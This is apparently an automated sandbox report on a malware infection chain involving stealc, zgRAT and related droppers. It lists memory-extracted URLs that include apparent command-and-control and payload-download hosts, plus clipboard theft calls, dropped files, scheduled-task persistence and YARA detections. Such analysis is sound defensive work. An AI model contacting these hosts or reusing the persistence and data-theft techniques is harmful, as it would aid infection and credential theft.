Source: stealc_default2.exe, 00000015.00000002.2318326891.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, JavvvUmar.exe, 0000001C.00000003.2400838500.0000000003282000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000003.2384713254.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: penis.exe, 00000018.00000002.2227774761.00000000031DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.s
Source: penis.exe, 00000018.00000002.2227774761.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, crypted.exe, 00000024.00000002.2377213784.0000000003B95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: penis.exe, 00000018.00000002.2227774761.00000000031DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ipH
Source: stealc_default2.exe, 00000015.00000002.2377662012.00000000271BE000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2318326891.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2838666402.00000000271CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
Source: stealc_default2.exe, 00000015.00000002.2377662012.00000000271BE000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2318326891.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2838666402.00000000271CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
Source: JavvvUmar.exe, 0000001C.00000003.2400838500.0000000003282000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000003.2384713254.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: stealc_default2.exe, 00000015.00000002.2318326891.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, JavvvUmar.exe, 0000001C.00000003.2400838500.0000000003282000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000003.2384713254.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: stealc_default2.exe, 00000015.00000002.2318326891.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, JavvvUmar.exe, 0000001C.00000003.2400838500.0000000003282000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000003.2384713254.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: acentric.exe, 0000001B.00000002.3279256939.00000000028D5000.00000004.00000800.00020000.00000000.sdmp, acentric.exe, 0000001B.00000002.3279256939.000000000287D000.00000004.00000800.00020000.00000000.sdmp, acentric.exe, 0000001B.00000002.3279256939.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://conditionprovice.pro
Source: acentric.exe, 0000001B.00000002.3279256939.0000000002821000.00000004.00000800.00020000.00000000.sdmp, acentric.exe, 0000001B.00000002.3301795761.0000000006940000.00000004.08000000.00040000.00000000.sdmp, acentric.exe, 0000001B.00000002.3279256939.000000000288A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://conditionprovice.pro/tmpdir/9872345234.cab
Source: acentric.exe, 0000001B.00000002.3279256939.00000000028D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://conditionprovice.pro/tmpdir/98723452p
Source: stealc_default2.exe, 00000015.00000002.2377662012.00000000271BE000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2318326891.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2838666402.00000000271CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: stealc_default2.exe, 00000015.00000002.2377662012.00000000271BE000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2318326891.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2838666402.00000000271CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: penis.exe, 00000018.00000002.2227774761.0000000003270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: JavvvUmar.exe, 0000001C.00000003.2400838500.0000000003282000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000003.2384713254.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: JavvvUmar.exe, 0000001C.00000003.2400838500.0000000003282000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000003.2384713254.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: JavvvUmar.exe, 0000001C.00000003.2400838500.0000000003282000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000003.2384713254.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com/
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com/&
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com/0B1D&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1CC6887805
Source: aspnet_regiis.exe, 00000020.00000003.3512830633.00000000029D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com/3n
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com/=M
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com/aL
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com/f
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com/socket/?id=5A
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com/socket/?id=5A7N
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com/socket/?id=5A90D63E0E4DDF045D88A0B893E4499EB6814BDA077145A36EC98B
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com/socket/?serviceCheckup4g
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com/socket/?serviceCheckupag
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/)c
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/6y
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/?i
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/?i/O
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/?id=
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/?id=32)
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/?id=32)U
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/?id=5A90D63E0E4DDF045D88A0B893E4499EB6814BDA077145A36E
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/?id=C
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/?id=H
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/?id=heckup
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/?id=heckup6
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/?id=l
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/?id=l~
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.0000000002968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/?serviceCheckup
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.0000000002968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/?serviceCheckupJ-
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/d
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/g
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/my
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://garageserviceoperation.com:443/socket/n
Source: JavvvUmar.exe, 0000001C.00000003.3201366776.0000000003E85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: needmoney.exe, 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2232110837.0000000000401000.00000020.00000001.01000000.0000001C.sdmp	String found in binary or memory: https://github.com/tesseract-ocr/tessdata/
Source: svchost015.exe, 0000001D.00000002.2838666402.00000000271CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: axplong.exe, 00000009.00000003.2542556757.0000000005D18000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.3837178625.0000000005D0F000.00000004.00000020.00020000.00000000.sdmp, needmoney.exe, 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: JavvvUmar.exe, 0000001C.00000002.3272158014.000000000087E000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: https://softwaredistributiononline.com/update
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.0000000002968000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc/
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc/%
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.0000000002968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc/&
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.0000000002968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc/(
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc/Q
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc/V
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc/kg
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc/socket/?id=5A90D63E0E4DDF045D88A0B893E4499EB6814BDA077145A36EC98B433E2DBDA1&u
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc/socket/?serviceCheckup
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.0000000002968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc/tionhub.cc:443/socket/?serviceCheckup4
Source: aspnet_regiis.exe, 00000020.00000002.3813346257.0000000000508000.00000004.00000010.00020000.00000000.sdmp, aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc:443/socket/
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc:443/socket/443/socket/
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc:443/socket/?id=
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc:443/socket/?id=/
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc:443/socket/?id=5A90D63E0E4DDF045D88A0B893E4499EB6814BDA077145A36EC98B433E2DBD
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc:443/socket/?id=A077145A
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc:443/socket/?id=Hy
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc:443/socket/?id=p2
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc:443/socket/?id=socket/
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc:443/socket/?id=socket/1y
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc:443/socket/?id=t/
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc:443/socket/?serviceCheckup
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc:443/socket/b.cc/
Source: aspnet_regiis.exe, 00000020.00000002.3813346257.0000000000508000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://solutionhub.cc:443/socket/w
Source: svchost015.exe, 0000001D.00000003.2496928212.000000002D275000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: svchost015.exe, 0000001D.00000003.2496928212.000000002D275000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
Source: stealc_default2.exe, 00000015.00000002.2377662012.00000000271BE000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2318326891.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2838666402.00000000271CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
Source: stealc_default2.exe, 00000015.00000002.2318326891.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, JavvvUmar.exe, 0000001C.00000003.2400838500.0000000003282000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000003.2384713254.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: JavvvUmar.exe, 0000001C.00000003.2400838500.0000000003282000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000003.2384713254.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: stealc_default2.exe, 00000015.00000002.2377662012.00000000271BE000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2318326891.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2838666402.00000000271CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: axplong.exe, 00000009.00000002.3830428963.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000003.2664280085.0000000000E46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.leopardi.nl/
Source: axplong.exe, 00000009.00000002.3830428963.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000003.2664280085.0000000000E46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.leopardi.nl/$
Source: axplong.exe, 00000009.00000002.3830428963.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000003.2664280085.0000000000E46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.leopardi.nl/frm/_vti_cnf/Blenar.exe
Source: stealc_default2.exe, 00000015.00000002.2324820547.0000000000F0C000.00000004.00000001.01000000.00000012.sdmp, svchost015.exe, 0000001D.00000002.2609194707.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: svchost015.exe, 0000001D.00000003.2496928212.000000002D275000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: stealc_default2.exe, 00000015.00000002.2324820547.0000000000F0C000.00000004.00000001.01000000.00000012.sdmp, svchost015.exe, 0000001D.00000002.2609194707.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: svchost015.exe, 0000001D.00000003.2496928212.000000002D275000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: stealc_default2.exe, 00000015.00000002.2324820547.0000000000F0C000.00000004.00000001.01000000.00000012.sdmp, svchost015.exe, 0000001D.00000002.2609194707.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: stealc_default2.exe, 00000015.00000003.2274355667.000000002D3AA000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000003.2496928212.000000002D275000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: stealc_default2.exe, 00000015.00000002.2324820547.0000000000F0C000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: svchost015.exe, 0000001D.00000002.2609194707.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/svchost015.exe
Source: svchost015.exe, 0000001D.00000003.2496928212.000000002D275000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: stealc_default2.exe, 00000015.00000003.2274355667.000000002D3AA000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000003.2496928212.000000002D275000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: stealc_default2.exe, 00000015.00000002.2324820547.0000000000F0C000.00000004.00000001.01000000.00000012.sdmp, svchost015.exe, 0000001D.00000002.2609194707.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: stealc_default2.exe, 00000015.00000003.2274355667.000000002D3AA000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000003.2496928212.000000002D275000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: needmoney.exe, 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ssl.com/repository0
Source: needmoney.exe, 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2232110837.0000000000401000.00000020.00000001.01000000.0000001C.sdmp	String found in binary or memory: https://www.x-ways.net/forensics/x-tensions.html
Source: needmoney.exe, 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2232110837.0000000000401000.00000020.00000001.01000000.0000001C.sdmp	String found in binary or memory: https://www.x-ways.net/forensics/x-tensions.htmlf
Source: needmoney.exe, 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2232110837.0000000000401000.00000020.00000001.01000000.0000001C.sdmp	String found in binary or memory: https://www.x-ways.net/winhex/forum/
Source: needmoney.exe, 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2232110837.0000000000401000.00000020.00000001.01000000.0000001C.sdmp	String found in binary or memory: https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection

Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe

Code function: 17_2_001B9000 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

17_2_001B9000

Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe

Code function: 17_2_001B9000 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

17_2_001B9000

Source: penis.exe, 00000018.00000002.2227774761.000000000339A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_8f15f5c4-f

Source: Yara match	File source: 29.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: needmoney.exe PID: 7808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 3708, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED

Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp7B3B.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp7B1A.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\TmpE29E.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\TmpE2AF.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp6957.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp6968.tmp	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 24.0.penis.exe.f40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\penis[1].exe, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen

.NET source code contains very large array initializations

Source: crypted[1].exe.9.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 311296
Source: crypted.exe.9.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 311296

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Tasks\axplong.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File created: C:\Windows\Tasks\Hkbsse.job
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	File created: C:\Windows\HardlyAircraft
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	File created: C:\Windows\ViewpictureKingdom
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	File created: C:\Windows\BrandonBlind
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	File created: C:\Windows\IpaqArthur

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00253068	9_2_00253068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00214CF0	9_2_00214CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00247D83	9_2_00247D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_0025765B	9_2_0025765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00214AF0	9_2_00214AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00258720	9_2_00258720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00256F09	9_2_00256F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_0025777B	9_2_0025777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00252BD0	9_2_00252BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_0027E872	9_1_0027E872
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_002960BD	9_1_002960BD
